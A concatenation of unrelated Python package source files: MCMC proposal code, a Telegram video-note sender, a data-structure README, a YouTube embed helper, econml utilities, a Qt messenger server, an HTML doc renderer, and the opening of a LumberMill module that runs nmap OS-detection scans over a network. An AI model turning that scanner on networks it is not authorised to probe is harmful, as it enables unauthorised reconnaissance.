        betas_here = np.repeat(
            self.temperature_control.betas[:, None], nwalkers, axis=-1
        ).flatten()

        # current Likelihood and prior information
        ll_here = self.current_state.log_like.flatten()
        lp_here = self.current_state.log_prior.flatten()

        # do rj setup
        assert len(nleaves_min_all) == 1 and len(nleaves_max_all) == 1
        nleaves_min = nleaves_min_all[key_in]
        nleaves_max = nleaves_max_all[key_in]

        if nleaves_min == nleaves_max:
            raise ValueError("MT RJ proposal requires that nleaves_min != nleaves_max.")
        elif nleaves_min > nleaves_max:
            raise ValueError("nleaves_min is greater than nleaves_max. Not allowed.")

        # get the inds adjustment information (which walkers add/remove which leaf)
        all_inds_for_change = self.get_model_change_proposal(
            branches_inds[key_in], random, nleaves_min, nleaves_max
        )

        # preparing leaf information for going into the proposal
        inds_leaves_rj = np.zeros(ntemps * nwalkers, dtype=int)
        coords_in = np.zeros((ntemps * nwalkers, ndim))
        inds_reverse_rj = None

        # prepare proposal dictionaries
        new_inds = deepcopy(branches_inds)
        q = deepcopy(branches_coords)

        for change in all_inds_for_change.keys():
            if change not in ["+1", "-1"]:
                raise ValueError("MT RJ is only implemented for +1/-1 moves.")

            # get indices of changing leaves
            temp_inds = all_inds_for_change[change][:, 0]
            walker_inds = all_inds_for_change[change][:, 1]
            leaf_inds = all_inds_for_change[change][:, 2]

            # leaf index to change, stored per flattened walker (temp * nwalkers + walker)
            inds_leaves_rj[temp_inds * nwalkers + walker_inds] = leaf_inds
            coords_in[temp_inds * nwalkers + walker_inds] = branches_coords[key_in][
                (temp_inds, walker_inds, leaf_inds)
            ]

            # adjustment of indices
            new_val = {"+1": True, "-1": False}[change]

            # adjust indices
            new_inds[key_in][(temp_inds, walker_inds, leaf_inds)] = new_val

            if change == "-1":
                # which walkers are removing
                inds_reverse_rj = temp_inds * nwalkers + walker_inds

                # setup reversal coords and inds
                # need to determine Likelihood and prior of removed binaries.
                # this goes into the multiple try proposal as previous ll and lp
                temp_reverse_coords = {}
                temp_reverse_inds = {}
                for key in self.current_state.branches:
                    (
                        ntemps_tmp,
                        nwalkers_tmp,
                        nleaves_max_tmp,
                        ndim_tmp,
                    ) = self.current_state.branches[key].shape

                    # coords from reversal (only the removing walkers; extra
                    # leading axis of 1 added for the compute functions)
                    temp_reverse_coords[key] = self.current_state.branches[key].coords.reshape(
                        ntemps_tmp * nwalkers_tmp, nleaves_max_tmp, ndim_tmp
                    )[inds_reverse_rj][None, :]

                    # which inds array to use: the updated one for the changing
                    # branch (leaf already flipped off), current ones otherwise
                    inds_tmp_here = (
                        new_inds[key]
                        if key == key_in
                        else self.current_state.branches[key].inds
                    )
                    temp_reverse_inds[key] = inds_tmp_here.reshape(
                        ntemps * nwalkers, nleaves_max_tmp
                    )[inds_reverse_rj][None, :]

                # calculate information for the reverse
                lp_reverse_here = self.current_model.compute_log_prior_fn(
                    temp_reverse_coords, inds=temp_reverse_inds
                )[0]

                # NOTE(review): ``logp=lp_here`` passes the full flattened prior
                # array while the coords/inds cover only the removing walkers —
                # confirm this matches the contract of compute_log_like_fn.
                ll_reverse_here = self.current_model.compute_log_like_fn(
                    temp_reverse_coords, inds=temp_reverse_inds, logp=lp_here
                )[0]

                # fill the here values so removals carry the one-less-leaf ll/lp
                ll_here[inds_reverse_rj] = ll_reverse_here
                lp_here[inds_reverse_rj] = lp_reverse_here

        # get mt proposal
        generated_points, factors = self.get_mt_proposal(
            coords_in,
            random,
            betas=betas_here,
            ll_in=ll_here,
            lp_in=lp_here,
            inds_leaves_rj=inds_leaves_rj,
            inds_reverse_rj=inds_reverse_rj,
        )

        # for reading outside
        self.mt_ll = self.mt_ll.reshape(ntemps, nwalkers)
        self.mt_lp = self.mt_lp.reshape(ntemps, nwalkers)

        # which walkers have information added
        inds_forward_rj = np.delete(np.arange(coords_in.shape[0]), inds_reverse_rj)

        # update the coordinates for the walkers that added a leaf
        temp_inds = all_inds_for_change["+1"][:, 0]
        walker_inds = all_inds_for_change["+1"][:, 1]
        leaf_inds = all_inds_for_change["+1"][:, 2]
        q[key_in][(temp_inds, walker_inds, leaf_inds)] = generated_points[
            inds_forward_rj
        ]

        return q, new_inds, factors.reshape(ntemps, nwalkers)
/Hikka_Pyro_New-2.0.103-py3-none-any.whl/hikkapyro/methods/messages/send_video_note.py |
import os
from datetime import datetime
from typing import Union, BinaryIO, Optional, Callable
import hikkapyro
from hikkapyro import StopTransmission
from hikkapyro import raw
from hikkapyro import types
from hikkapyro import utils
from hikkapyro.errors import FilePartMissing
from hikkapyro.file_id import FileType
class SendVideoNote:
    async def send_video_note(
        self: "hikkapyro.Client",
        chat_id: Union[int, str],
        video_note: Union[str, BinaryIO],
        duration: int = 0,
        length: int = 1,
        thumb: Union[str, BinaryIO] = None,
        disable_notification: bool = None,
        reply_to_message_id: int = None,
        schedule_date: datetime = None,
        protect_content: bool = None,
        reply_markup: Union[
            "types.InlineKeyboardMarkup",
            "types.ReplyKeyboardMarkup",
            "types.ReplyKeyboardRemove",
            "types.ForceReply"
        ] = None,
        progress: Callable = None,
        progress_args: tuple = ()
    ) -> Optional["types.Message"]:
        """Send video note messages.

        .. include:: /_includes/usable-by/users-bots.rst

        Parameters:
            chat_id (``int`` | ``str``):
                Unique identifier (int) or username (str) of the target chat.
                For your personal cloud (Saved Messages) you can simply use "me" or "self".
                For a contact that exists in your Telegram address book you can use his phone number (str).

            video_note (``str`` | ``BinaryIO``):
                Video note to send.
                Pass a file_id as string to send a video note that exists on the Telegram servers,
                pass a file path as string to upload a new video note that exists on your local machine, or
                pass a binary file-like object with its attribute ".name" set for in-memory uploads.
                Sending video notes by a URL is currently unsupported.

            duration (``int``, *optional*):
                Duration of sent video in seconds.

            length (``int``, *optional*):
                Video width and height.

            thumb (``str`` | ``BinaryIO``, *optional*):
                Thumbnail of the video sent.
                The thumbnail should be in JPEG format and less than 200 KB in size.
                A thumbnail's width and height should not exceed 320 pixels.
                Thumbnails can't be reused and can be only uploaded as a new file.

            disable_notification (``bool``, *optional*):
                Sends the message silently.
                Users will receive a notification with no sound.

            reply_to_message_id (``int``, *optional*):
                If the message is a reply, ID of the original message

            schedule_date (:py:obj:`~datetime.datetime`, *optional*):
                Date when the message will be automatically sent.

            protect_content (``bool``, *optional*):
                Protects the contents of the sent message from forwarding and saving.

            reply_markup (:obj:`~pyrogram.types.InlineKeyboardMarkup` | :obj:`~pyrogram.types.ReplyKeyboardMarkup` | :obj:`~pyrogram.types.ReplyKeyboardRemove` | :obj:`~pyrogram.types.ForceReply`, *optional*):
                Additional interface options. An object for an inline keyboard, custom reply keyboard,
                instructions to remove reply keyboard or to force a reply from the user.

            progress (``Callable``, *optional*):
                Pass a callback function to view the file transmission progress.
                The function must take *(current, total)* as positional arguments (look at Other Parameters below for a
                detailed description) and will be called back each time a new file chunk has been successfully
                transmitted.

            progress_args (``tuple``, *optional*):
                Extra custom arguments for the progress callback function.
                You can pass anything you need to be available in the progress callback scope; for example, a Message
                object or a Client instance in order to edit the message with the updated progress status.

        Other Parameters:
            current (``int``):
                The amount of bytes transmitted so far.

            total (``int``):
                The total size of the file.

            *args (``tuple``, *optional*):
                Extra custom arguments as defined in the ``progress_args`` parameter.
                You can either keep ``*args`` or add every single extra argument in your function signature.

        Returns:
            :obj:`~pyrogram.types.Message` | ``None``: On success, the sent video note message is returned, otherwise,
            in case the upload is deliberately stopped with :meth:`~pyrogram.Client.stop_transmission`, None is
            returned.

        Example:
            .. code-block:: python

                # Send video note by uploading from local file
                await app.send_video_note("me", "video_note.mp4")

                # Set video note length
                await app.send_video_note("me", "video_note.mp4", length=25)
        """
        file = None

        try:
            if isinstance(video_note, str):
                if os.path.isfile(video_note):
                    # Local file path: upload the thumbnail (if any) and the
                    # video note itself, then wrap them as an uploaded document.
                    thumb = await self.save_file(thumb)
                    file = await self.save_file(video_note, progress=progress, progress_args=progress_args)
                    media = raw.types.InputMediaUploadedDocument(
                        mime_type=self.guess_mime_type(video_note) or "video/mp4",
                        file=file,
                        thumb=thumb,
                        attributes=[
                            raw.types.DocumentAttributeVideo(
                                round_message=True,
                                duration=duration,
                                w=length,
                                h=length
                            )
                        ]
                    )
                else:
                    # Not a path on disk: treat the string as a Telegram file_id.
                    media = utils.get_input_media_from_file_id(video_note, FileType.VIDEO_NOTE)
            else:
                # Binary file-like object: upload it directly.
                thumb = await self.save_file(thumb)
                file = await self.save_file(video_note, progress=progress, progress_args=progress_args)
                media = raw.types.InputMediaUploadedDocument(
                    mime_type=self.guess_mime_type(video_note.name) or "video/mp4",
                    file=file,
                    thumb=thumb,
                    attributes=[
                        raw.types.DocumentAttributeVideo(
                            round_message=True,
                            duration=duration,
                            w=length,
                            h=length
                        )
                    ]
                )

            while True:
                try:
                    r = await self.invoke(
                        raw.functions.messages.SendMedia(
                            peer=await self.resolve_peer(chat_id),
                            media=media,
                            silent=disable_notification or None,
                            reply_to_msg_id=reply_to_message_id,
                            random_id=self.rnd_id(),
                            schedule_date=utils.datetime_to_timestamp(schedule_date),
                            noforwards=protect_content,
                            reply_markup=await reply_markup.write(self) if reply_markup else None,
                            message=""
                        )
                    )
                except FilePartMissing as e:
                    # Telegram reported a missing chunk: re-upload that part
                    # and retry sending the media.
                    await self.save_file(video_note, file_id=file.id, file_part=e.value)
                else:
                    # Find the update carrying the sent message and parse it.
                    for i in r.updates:
                        if isinstance(i, (raw.types.UpdateNewMessage,
                                          raw.types.UpdateNewChannelMessage,
                                          raw.types.UpdateNewScheduledMessage)):
                            return await types.Message._parse(
                                self, i.message,
                                {i.id: i for i in r.users},
                                {i.id: i for i in r.chats},
                                is_scheduled=isinstance(i, raw.types.UpdateNewScheduledMessage)
                            )
        except StopTransmission:
            # Upload was deliberately stopped via stop_transmission().
            return None
Cache
============
The idea of caching items for fast retrieval goes back nearly to the beginning of computer science. We also use that idea and keep an LRU cache for storing the morphological analyses of surface forms. Before analyzing a surface form, we first look it up in the cache, and if there is a hit, we simply take the analyses from the cache. If there is a miss, we analyze the surface form and put its morphological analyses into the LRU cache. As can be expected, the speed of the caching mechanism depends on the size of the cache.
For Developers
============
You can also see [Cython](https://github.com/starlangsoftware/DataStructure-Cy), [Java](https://github.com/starlangsoftware/DataStructure), [C++](https://github.com/starlangsoftware/DataStructure-CPP), [Swift](https://github.com/starlangsoftware/DataStructure-Swift), [Js](https://github.com/starlangsoftware/DataStructure-Js), or [C#](https://github.com/starlangsoftware/DataStructure-CS) repository.
## Requirements
* [Python 3.7 or higher](#python)
* [Git](#git)
### Python
To check if you have a compatible version of Python installed, use the following command:
python -V
You can find the latest version of Python [here](https://www.python.org/downloads/).
### Git
Install the [latest version of Git](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git).
## Pip Install
pip3 install NlpToolkit-DataStructure
## Download Code
In order to work on code, create a fork from GitHub page.
Use Git for cloning the code to your local or below line for Ubuntu:
git clone <your-fork-git-link>
A directory called DataStructure will be created. Or you can use below link for exploring the code:
git clone https://github.com/starlangsoftware/DataStructure-Py.git
## Open project with Pycharm IDE
Steps for opening the cloned project:
* Start IDE
* Select **File | Open** from main menu
* Choose `DataStructure-PY` file
* Select open as project option
* Couple of seconds, dependencies will be downloaded.
For Developers
============
+ [CounterHashMap](#counterhashmap)
+ [LRUCache](#lrucache)
## CounterHashMap
CounterHashMap bir veri tipinin kaç kere geçtiğini hafızada tutmak için kullanılmaktadır.
Bir CounterHashMap yaratmak için
a = CounterHashMap()
Hafızaya veri eklemek için
put(self, key: object)
Örneğin,
a.put("ali");
Bu aşamanın ardından "ali" nin sayacı 1 olur.
Hafızaya o veriyi birden fazla kez eklemek için
putNTimes(self, key: object, N: int)
Örneğin,
a.putNTimes("veli", 5)
Bu aşamanın ardından "veli"'nin sayacı 5 olur.
Hafızada o verinin kaç kere geçtiğini bulmak için
count(self, key: object) -> int
Örneğin, "veli" nin kaç kere geçtiğini bulmak için
kacKere = a.count("veli")
Bu aşamanın ardından kacKere değişkeninin değeri 5 olur.
Hafızada hangi verinin en çok geçtiğini bulmak için
max(self) -> object
Örneğin,
kelime = a.max()
Bu aşamanın ardından kelime "veli" olur.
## LRUCache
LRUCache veri cachelemek için kullanılan bir veri yapısıdır. LRUCache en yakın zamanda
kullanılan verileri öncelikli olarak hafızada tutar. Bir LRUCache yaratmak için
LRUCache(self, cacheSize: int)
kullanılır. cacheSize burada cachelenecek verinin büyüklüğünün limitini göstermektedir.
Cache'e bir veri eklemek için
add(self, key: object, data: object)
kullanılır. data burada eklenecek veriyi, key anahtar göstergeyi göstermektedir.
Cache'de bir veri var mı diye kontrol etmek için
contains(self, key: object) -> bool
kullanılır.
Cache'deki veriyi anahtarına göre getirmek için
get(self, key: object) -> object
kullanılır.
| PypiClean |
/IPNB-video-embed-0.0.3.tar.gz/IPNB-video-embed-0.0.3/src/IPNBvideoembed/youtube.py | from ensure import ensure_annotations
from IPNBvideoembed.logger import logger
from IPNBvideoembed.custom_exception import InvalidURLException
from py_youtube import Data
from IPython import display
@ensure_annotations
def get_time_info(url: str) -> int:
    """Extract the start-time offset (in seconds) from a YouTube URL.

    Handles both long ("...watch?v=<id>[&t=<sec>s]") and short
    ("youtu.be/<id>[?t=<sec>]") URL forms. Returns 0 when no start time
    is encoded in the URL.

    Raises:
        InvalidURLException: if the URL is malformed or the video id does
            not have the expected 11-character length.
    """

    def _verify_videoIDlen(videoID: str, __expected_len=11):
        # YouTube video ids are always exactly 11 characters long.
        if len(videoID) != __expected_len:
            raise InvalidURLException(
                f"Invalid URL: {url}, expected length of videoID is {__expected_len}"
            )

    try:
        split_val = url.split("=")
        # A well-formed watch/short URL never has more than two "=" signs,
        # and never a doubled "==".
        if (len(split_val) > 3) or (len(url.split("==")) > 1):
            raise InvalidURLException
        if "watch" in url:
            if "&t" in url:
                # e.g. .../watch?v=<id>&t=90s -> strip "&t" from the id and
                # the trailing "s" from the seconds value.
                vid_id, time = url.split("=")[-2][:-2], int(url.split("=")[-1][:-1])
            else:
                # e.g. .../watch?v=<id> -> no start offset.
                vid_id, time = url.split("=")[-1], 0
        else:
            if ("=" in url) and ("&t=" in url):
                # Short URL with a time query string.
                vid_id, time = url.split("/")[-1].split("?")[0], int(
                    url.split("/")[-1].split("?")[1].split("=")[-1]
                )
            else:
                # Short URL without a start offset.
                vid_id, time = url.split("/")[-1].split("?")[0], 0
        _verify_videoIDlen(vid_id)
        logger.info(f"video starts at: {time}")
        return time
    except InvalidURLException:
        # Keep the specific message raised above instead of collapsing it
        # into a bare InvalidURLException (the previous behaviour).
        raise
    except Exception:
        # Any other parsing failure (e.g. int() on a malformed time value)
        # is reported as an invalid URL.
        raise InvalidURLException
@ensure_annotations
def render_youtube_video(url: str, width: int = 780, height: int = 600) -> str:
    """Embed a YouTube video inline in the current IPython/Jupyter cell.

    Builds an ``<iframe>`` pointing at the video's embed URL, honouring any
    start-time offset encoded in *url*, and displays it via IPython.

    Args:
        url: full YouTube watch/short URL.
        width: iframe width in pixels.
        height: iframe height in pixels.

    Returns:
        The string ``"success"`` once the iframe has been displayed.

    Raises:
        InvalidURLException: if *url* is None, malformed, or does not
            resolve to a published video.
    """
    try:
        if url is None:
            raise InvalidURLException("URL cannot be None")
        data = Data(url).data()
        # A present publish date is used as the signal that the URL resolves
        # to a real, published video.
        if data["publishdate"] is not None:
            time = get_time_info(url)
            vid_ID = data["id"]
            embed_url = f"https://www.youtube.com/embed/{vid_ID}/?start={time}"
            logger.info(f"embed_url = {embed_url}")
            iframe = f"""
            <iframe width="{width}" height="{height}"
            src="{embed_url}"
            title="YouTube video player"
            frameborder="0"
            allow="accelerometer; autoplay;
            clipboard-write; encrypted-media;
            gyroscope; picture-in-picture;
            web-share" allowfullscreen>
            </iframe>
            """
            display.display(display.HTML(iframe))
            return "success"
        else:
            raise InvalidURLException("Invalid URL")
    except Exception as e:
        raise e
/LUBEAT-0.13.1-cp38-cp38-macosx_10_9_x86_64.whl/econml/_ensemble/_utilities.py |
import numbers
import numpy as np
def _get_n_samples_subsample(n_samples, max_samples):
"""
Get the number of samples in a sub-sample without replacement.
Parameters
----------
n_samples : int
Number of samples in the dataset.
max_samples : int or float
The maximum number of samples to draw from the total available:
- if float, this indicates a fraction of the total and should be
the interval `(0, 1)`;
- if int, this indicates the exact number of samples;
- if None, this indicates the total number of samples.
Returns
-------
n_samples_subsample : int
The total number of samples to draw for the subsample.
"""
if max_samples is None:
return n_samples
if isinstance(max_samples, numbers.Integral):
if not (1 <= max_samples <= n_samples):
msg = "`max_samples` must be in range 1 to {} but got value {}"
raise ValueError(msg.format(n_samples, max_samples))
return max_samples
if isinstance(max_samples, numbers.Real):
if not (0 < max_samples <= 1):
msg = "`max_samples` must be in range (0, 1) but got value {}"
raise ValueError(msg.format(max_samples))
return int(np.floor(n_samples * max_samples))
msg = "`max_samples` should be int or float, but got type '{}'"
raise TypeError(msg.format(type(max_samples)))
def _accumulate_prediction(predict, X, out, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
def _accumulate_prediction_var(predict, X, out, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
Accumulates the mean covariance of a tree prediction. predict is assumed to
return an array of (n_samples, d) or a tuple of arrays. This method accumulates in the placeholder
out[0] the (n_samples, d, d) covariance of the columns of the prediction across
the trees and for each sample (or a tuple of covariances to be stored in each element
of the list out).
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += np.einsum('ijk,ikm->ijm',
prediction.reshape(prediction.shape + (1,)),
prediction.reshape((-1, 1) + prediction.shape[1:]))
else:
for i in range(len(out)):
pred_i = prediction[i]
out[i] += np.einsum('ijk,ikm->ijm',
pred_i.reshape(pred_i.shape + (1,)),
pred_i.reshape((-1, 1) + pred_i.shape[1:]))
def _accumulate_prediction_and_var(predict, X, out, out_var, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
Combines `_accumulate_prediction` and `_accumulate_prediction_var` in a single
parallel run, so that out will contain the mean of the predictions across trees
and out_var the covariance.
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += prediction
out_var[0] += np.einsum('ijk,ikm->ijm',
prediction.reshape(prediction.shape + (1,)),
prediction.reshape((-1, 1) + prediction.shape[1:]))
else:
for i in range(len(out)):
pred_i = prediction[i]
out[i] += prediction
out_var[i] += np.einsum('ijk,ikm->ijm',
pred_i.reshape(pred_i.shape + (1,)),
pred_i.reshape((-1, 1) + pred_i.shape[1:]))
def _accumulate_oob_preds(tree, X, subsample_inds, alpha_hat, jac_hat, counts, lock):
mask = np.ones(X.shape[0], dtype=bool)
mask[subsample_inds] = False
alpha, jac = tree.predict_alpha_and_jac(X[mask])
with lock:
alpha_hat[mask] += alpha
jac_hat[mask] += jac
counts[mask] += 1 | PypiClean |
/Moshu_QtMesseger_server-0.1-py3-none-any.whl/server/server.py | import sys
import os
import argparse
import logging
import configparser
import logs.config_server_log
from common.variables import *
from common.utils import *
from common.decos import log
from server.core import MessageProcessor
from server.database import ServerStorage
from server.main_window import MainWindow
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import Qt
# Server-side logger initialisation.
logger = logging.getLogger('server_dist')
@log
def arg_parser(default_port, default_address):
    """Parse the command-line arguments.

    Recognised options:
      -p        listen port (int; defaults to ``default_port``)
      -a        listen address (defaults to ``default_address``)
      --no_gui  run the server without the Qt GUI

    Returns a ``(listen_address, listen_port, gui_flag)`` tuple.
    """
    logger.debug(
        f'Инициализация парсера аргументов коммандной строки: {sys.argv}')
    parser = argparse.ArgumentParser()
    parser.add_argument('-p', default=default_port, type=int, nargs='?')
    parser.add_argument('-a', default=default_address, nargs='?')
    parser.add_argument('--no_gui', action='store_true')
    namespace = parser.parse_args(sys.argv[1:])
    listen_address = namespace.a
    listen_port = namespace.p
    gui_flag = namespace.no_gui
    logger.debug('Аргументы успешно загружены.')
    return listen_address, listen_port, gui_flag
@log
def config_load():
    """Load the server configuration from its ini file.

    The file is looked up relative to the *current working directory*
    (NOTE(review): not the module location -- confirm this is intended).
    If the file is missing or lacks a [SETTINGS] section, an in-memory
    default configuration is returned; the defaults are not written back
    to disk.
    """
    config = configparser.ConfigParser()
    dir_path = os.getcwd()
    config.read(f"{dir_path}/{'server_dist+++.ini'}")
    # If the config file was read correctly use it as-is, otherwise fall
    # back to default settings.
    if 'SETTINGS' in config:
        return config
    else:
        config.add_section('SETTINGS')
        config.set('SETTINGS', 'Default_port', str(DEFAULT_PORT))
        config.set('SETTINGS', 'Listen_Address', '')
        config.set('SETTINGS', 'Database_path', '')
        config.set('SETTINGS', 'Database_file', 'server_database.db3')
        return config
@log
def main():
    """Server entry point: load config, start the message processor and
    either the Qt GUI or a minimal console loop."""
    # Load the server configuration file.
    config = config_load()
    # Parse command-line parameters; missing ones fall back to the
    # configured defaults.
    listen_address, listen_port, gui_flag = arg_parser(
        config['SETTINGS']['Default_port'], config['SETTINGS']['Listen_Address'])
    # Initialise the server database.
    database = ServerStorage(
        os.path.join(
            config['SETTINGS']['Database_path'],
            config['SETTINGS']['Database_file']))
    # Create the server (message processor) instance and start it as a
    # daemon thread:
    server = MessageProcessor(listen_address, listen_port, database)
    server.daemon = True
    server.start()
    # If the no-GUI flag was given, run a minimal console command loop
    # instead of the Qt interface.
    if gui_flag:
        while True:
            command = input('Введите exit для завершения работы сервера.')
            if command == 'exit':
                # On exit, stop the server's main loop and wait for the
                # thread to finish.
                server.running = False
                server.join()
                break
    # Otherwise start the graphical interface:
    else:
        # Create the Qt application environment for the server:
        server_app = QApplication(sys.argv)
        server_app.setAttribute(Qt.AA_DisableWindowContextHelpButton)
        main_window = MainWindow(database, server, config)
        # Run the GUI event loop (blocks until all windows close).
        server_app.exec_()
        # Once the windows are closed, stop the message processor.
        server.running = False
if __name__ == '__main__':
    # Run the server only when executed as a script (stray dataset artifact
    # removed from this line).
    main()
/Kamaelia-0.6.0.tar.gz/Kamaelia-0.6.0/Tools/DocGen/renderHTML.py | import textwrap
import inspect
import pprint
import time
from docutils import core
from docutils import nodes
import docutils
import re
class RenderHTML(object):
    """\
    RenderHTML([debug][,titlePrefix][,urlPrefix][,rawFooter]) -> new RenderHTML object

    Renders docutils document trees to html with Kamaelia website specific
    directives.

    Also contains helper functions for determining filenames and URIs for
    documents.

    Keyword arguments::

    - debug        -- Optional. True for debugging mode - currently does nothing (default=False)
    - titlePrefix  -- Optional. Prefix for the HTML <head><title> (default="")
    - urlPrefix    -- Optional. Prefix for all URLs. Should include a trailing slash if needed (default="")
    - rawFooter    -- Optional. Footer text that will be appended just before the </body></html> tags (default="")
    """
    def __init__(self, debug=False, titlePrefix="", urlPrefix="", rawFooter=""):
        super(RenderHTML, self).__init__()
        self.titlePrefix = titlePrefix
        self.debug = debug
        self.urlPrefix = urlPrefix
        self.rawFooter = rawFooter
        # pattern -> URI mappings used for automatic cross-linking; populated
        # by setAutoCrossLinks()/addAutoLinksToURI().
        self.mappings = {}

    def makeFilename(self, docName):
        """\
        Returns the file name for a given document name.

        Eg. "Kamaelia.Chassis" will be mapped to something like "Kamaelia.Chassis.html"
        """
        return docName + ".html"

    def makeURI(self, docName, internalRef=None):
        """\
        Returns the URI for a given document name. Takes into account the url prefix.
        An optional internalRef is appended as a "#fragment".

        Eg. "Kamaelia.Chassis" will be mapped to something like "/mydocs/Kamaelia.Chassis.html"
        """
        if internalRef is not None:
            suffix = "#" + internalRef
        else:
            suffix = ""
        return self.urlPrefix + self.makeFilename(docName) + suffix

    def setAutoCrossLinks(self, mappings):
        """\
        Set mapping for the automagic generation of hyperlinks between content.

        Supply a dict of mappings mapping patterns (strings) to the fully qualified
        entity name to be linked to.
        """
        self.mappings = {}
        for (key, ref) in mappings.items():
            # compile as an RE - detects the pattern providing nothing preceeds it,
            # and it is not part of a larger pattern, eg A.B is part of A.B.C
            pattern = re.compile(r"(?<![a-zA-Z0-9._])" + re.escape(key) + r"(?!\.?[a-zA-Z0-9_])")
            # convert the destination to a URI
            uri = self.makeURI(ref)
            self.mappings[pattern] = uri

    def addAutoLinksToURI(self, mappings):
        """Add pattern -> URI mappings directly (URIs are used verbatim)."""
        for (key, uri) in mappings.items():
            pattern = re.compile(r"(?<![a-zA-Z0-9._])" + re.escape(key) + r"(?!\.?[a-zA-Z0-9_])")
            self.mappings[pattern] = uri

    def render(self, docName, docTree):
        """\
        Render the named document tree as HTML with Kamaelia website specific directives.

        Returns string containing the entire HTML document.
        """
        if not isinstance(docTree, nodes.document):
            # Wrap a bare node in a proper docutils document so transforms work.
            root = core.publish_doctree('')
            root.append(docTree)
            docTree = root

        docTree.attributes['title'] = docName

        # do this first, before we turn the boxright nodes into "[ [boxright] ... ]"
        docTree.transformer.add_transform(squareBracketReplace_transform)
        docTree.transformer.apply_transforms()

        docTree.transformer.add_transform(boxright_transform)
        docTree.transformer.add_transform(crosslink_transform, priority=None, mappings=self.mappings)
        docTree.transformer.apply_transforms()

        reader = docutils.readers.doctree.Reader(parser_name='null')
        pub = core.Publisher(reader, None, None, source=docutils.io.DocTreeInput(docTree),
                             destination_class=docutils.io.StringOutput)
        pub.set_writer("html")
        # publish() renders into pub.writer.parts; the return value is unused.
        pub.publish(enable_exit_status=None)
        parts = pub.writer.parts

        doc = parts["html_title"] \
              + parts["html_subtitle"] \
              + parts["docinfo"] \
              + parts["fragment"]

        wholedoc = self.headers(docTree) + doc + self.footers(docTree)
        return wholedoc

    def headers(self, doc):
        """Return the HTML preamble, including the <title> and inline CSS."""
        title = self.titlePrefix + doc.attributes['title']
        # BUGFIX: was type="test/css", which browsers ignore as a stylesheet.
        return """\
<html>
<head>
<title>"""+title+"""</title>
<style type="text/css">
pre.literal-block, pre.doctest-block {
margin-left: 2em ;
margin-right: 2em ;
background-color: #eeeeee }
</style>
</head>
<body>
"""

    def footers(self, doc):
        """Return the raw footer (if any) followed by the closing tags."""
        return self.rawFooter + "</body></html>\n"
from Nodes import boxright
class boxright_transform(docutils.transforms.Transform):
    """\
    Transform that replaces boxright nodes with the corresponding Kamaelia
    website [[boxright] <child node content> ] directive

    Each boxright node's children are wrapped in literal "[[boxright] ... ]"
    text markers, then the node itself is replaced by an anonymous docutils
    container holding those children.
    """
    default_priority=100
    def apply(self):
        boxes=[]
        for target in self.document.traverse(boxright):
            # Surround the node's children with the website directive markers.
            target.insert(0, nodes.Text("[[boxright] "))
            target.append(nodes.Text("]"))
            boxes.append(target)
        # Replace collected nodes after traversal so we do not mutate the
        # tree while iterating over it.
        for box in boxes:
            box.replace_self( nodes.container('', *box.children) )
class crosslink_transform(docutils.transforms.Transform):
    """\
    Transform that searches text in the document for any of the patterns in the
    supplied set of mappings. If a pattern is found it is converted to a
    hyperlink (a docutils reference node pointing at the mapped URI).
    """
    default_priority=100
    def apply(self, mappings):
        # mappings: dict of {compiled regex pattern: URI}
        self.mappings = mappings
        self.recurse(self.document)
    def recurse(self, parent):
        # Walk the children by index (not iterator) because crosslink()
        # replaces one Text node with up to three new nodes in place.
        i=0
        while i<len(parent.children):
            thisNode = parent[i]
            if isinstance(thisNode, nodes.Text):
                changeMade = self.crosslink(parent, i)
                # If a substitution happened, re-examine the same index: it
                # now holds the (possibly still matching) head text.
                if not changeMade:
                    i=i+1
            else:
                # Skip existing hyperlinks so we never nest references.
                if isinstance(thisNode, (nodes.reference,)): # nodes.literal_block)):
                    pass
                elif thisNode.children:
                    self.recurse(thisNode)
                i=i+1
    def crosslink(self, parent, i):
        # Try each pattern against the text node at parent[i]; on the first
        # match, split the text into head / linked middle / tail and return
        # True. Returns False when no pattern matches.
        text = parent[i].astext()
        for pattern in self.mappings.keys():
            match = pattern.search(text)
            if match:
                head = text[:match.start()]
                tail = text[match.end():]
                middle = text[match.start():match.end()]
                URI = self.mappings[pattern]
                parent.remove(parent[i])
                # Insert in reverse order so the final sequence at index i is
                # head, reference(middle), tail.
                if tail:
                    parent.insert(i, nodes.Text(tail))
                if middle:
                    parent.insert(i, nodes.reference('', nodes.Text(middle), refuri=URI))
                if head:
                    parent.insert(i, nodes.Text(head))
                return True
        return False
class squareBracketReplace_transform(docutils.transforms.Transform):
    """\
    Transform that replaces square brackets in text with escape codes, so that
    the Kamaelia website doesn't interpret them as directives.

    '[' becomes '%91%' and ']' becomes '%93%' (the website's escape codes).
    """
    default_priority=100
    def apply(self):
        for target in self.document.traverse(nodes.Text):
            newText = target.replace("[","%91%")
            newText = newText.replace("]","%93%")
            # NOTE(review): str.replace returns a plain string, not a
            # docutils Text node -- confirm parent.replace accepts it.
            target.parent.replace(target, newText)
/LumberMill-0.9.5.7-py3-none-any.whl/lumbermill/input/NmapScanner.py | import sys
import nmap
import lumbermill.utils.DictUtils as DictUtils
from lumbermill.BaseModule import BaseModule
from lumbermill.utils.Decorators import ModuleDocstringParser, setInterval
from lumbermill.utils.misc import TimedFunctionManager
@ModuleDocstringParser
class NmapScanner(BaseModule):
"""
Scan network with nmap and emit result as new event.
Configuration template:
- input.NmapScanner:
network: # <type: string; is: required>
netmask: # <default: '/24'; type: string; is: optional>
ports: # <default: None; type: None||string; is: optional>
arguments: # <default: '-O -F --osscan-limit'; type: string; is: optional>
interval: # <default: 900; type: integer; is: optional>
receivers:
- NextModule
"""
module_type = "input"
"""Set module type"""
# TODO: This module can run in forked processes. We need some way to partition the network and give each process a
# segment to scan.
can_run_forked = False
def configure(self, configuration):
